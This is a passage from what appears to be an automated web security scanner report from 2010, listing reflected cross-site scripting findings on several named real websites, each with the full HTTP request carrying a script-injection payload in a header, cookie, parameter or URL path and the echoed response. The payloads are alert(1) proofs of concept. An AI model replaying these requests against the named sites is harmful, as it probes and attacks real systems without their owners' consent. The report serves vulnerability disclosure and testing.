GET /tabid/91/jobid/865/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: cdc31"><a>bd65bee1256
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:33:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46664
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|865~ref|cdc31"><a>bd65bee1256 "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f193"><a>f3f705b143c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/867/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: 3f193"><a>f3f705b143c
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:33:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|867~ref|3f193"><a>f3f705b143c "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5684"><a>683ca02c35f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/868/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: c5684"><a>683ca02c35f
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:33:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49237
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|868~ref|c5684"><a>683ca02c35f "> ...[SNIP]...
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 656d4"><script>alert(1)</script>54e38e951a9 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /13161?redirect=www.seetorontonow.com/?ucid=P2010-000211/x22656d4"><script>alert(1)</script>54e38e951a9 HTTP/1.1 Host: ads1.dbaseregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML> <HEAD> <TITLE>Redirection</TITLE> </HEAD> <BODY> <H2>Redirection</H2> <A HREF="http://www.seetorontonow.com/?ucid=P2010-000211/x22656d4"><script>alert(1)</script>54e38e951a9"> ...[SNIP]...
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload d2ada<script>alert(1)</script>3637bc12b4b was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?fpc=ac7bcfc-12c80dbc658-551678af-1&purl=null&jsref= HTTP/1.1 Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://edge.sharethis.com/share4x/index.8977a5c7be5630214d328a2ac3111917.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CtZmwEyzRb19rULmKqKUAg==d2ada<script>alert(1)</script>3637bc12b4b
Response
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Thu, 25 Nov 2010 03:27:42 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 Content-Length: 642
<html> <head><title>ShareThis Segmenter</title></head> <body> <script type="text/javascript"> var google_conversion_id = 1036609180; var google_conversion_language = "en"; var goo ...[SNIP]... <div style='display:none'>clicookie:CtZmwEyzRb19rULmKqKUAg==d2ada<script>alert(1)</script>3637bc12b4b userid: </div> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa279"><script>alert(1)</script>363f203e213 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /free_adult_dating_shortstrip_heather_v6fa279"><script>alert(1)</script>363f203e213/53425/atnight/ HTTP/1.1 Host: tour.xxxmatch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 25 Nov 2010 03:58:33 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.7 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: referral_path=%2F53752%2F%2F%2F0%2F0; expires=Thu, 09-Dec-2010 03:58:33 GMT; path=/; domain=.xxxmatch.com Location: http://tour1.xxxmatch.com/free_adult_dating_shortstrip_heather_v6fa279"><script>alert(1)</script>363f203e213/53425/atnight/ Content-Length: 194 Connection: close Content-Type: text/html
<a href="http://tour1.xxxmatch.com/free_adult_dating_shortstrip_heather_v6fa279"><script>alert(1)</script>363f203e213/53425/atnight/">Click here</a> if you have not been redirected automatically
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb90c"><script>alert(1)</script>616c327bc1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /free_adult_dating_shortstrip_heather_v6fb90c"><script>alert(1)</script>616c327bc1b/53425/banneratnight/ HTTP/1.1 Host: tour.xxxmatch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 25 Nov 2010 03:59:02 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.7 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: referral_path=%2F53753%2F%2F%2F0%2F0; expires=Thu, 09-Dec-2010 03:59:02 GMT; path=/; domain=.xxxmatch.com Location: http://tour1.xxxmatch.com/free_adult_dating_shortstrip_heather_v6fb90c"><script>alert(1)</script>616c327bc1b/53425/banneratnight/ Content-Length: 200 Connection: close Content-Type: text/html
<a href="http://tour1.xxxmatch.com/free_adult_dating_shortstrip_heather_v6fb90c"><script>alert(1)</script>616c327bc1b/53425/banneratnight/">Click here</a> if you have not been redirected automatically
2.349. http://www.skulealumni.ca/ [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.skulealumni.ca
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 16c77'><script>alert(1)</script>ee9c68bc5b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16c77\'><script>alert(1)</script>ee9c68bc5b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?16c77'><script>alert(1)</script>ee9c68bc5b3=1 HTTP/1.1 Host: www.skulealumni.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 25 Nov 2010 02:25:53 GMT Server: Apache/1.3.29 (Unix) PHP/4.3.4 X-Powered-By: PHP/4.3.4 Location: http://alumni.utoronto.ca/s/731/index.aspx?sid=731&gid=36&/?16c77\'><script>alert(1)</script>ee9c68bc5b3=1 Connection: close Content-Type: text/html Content-Length: 190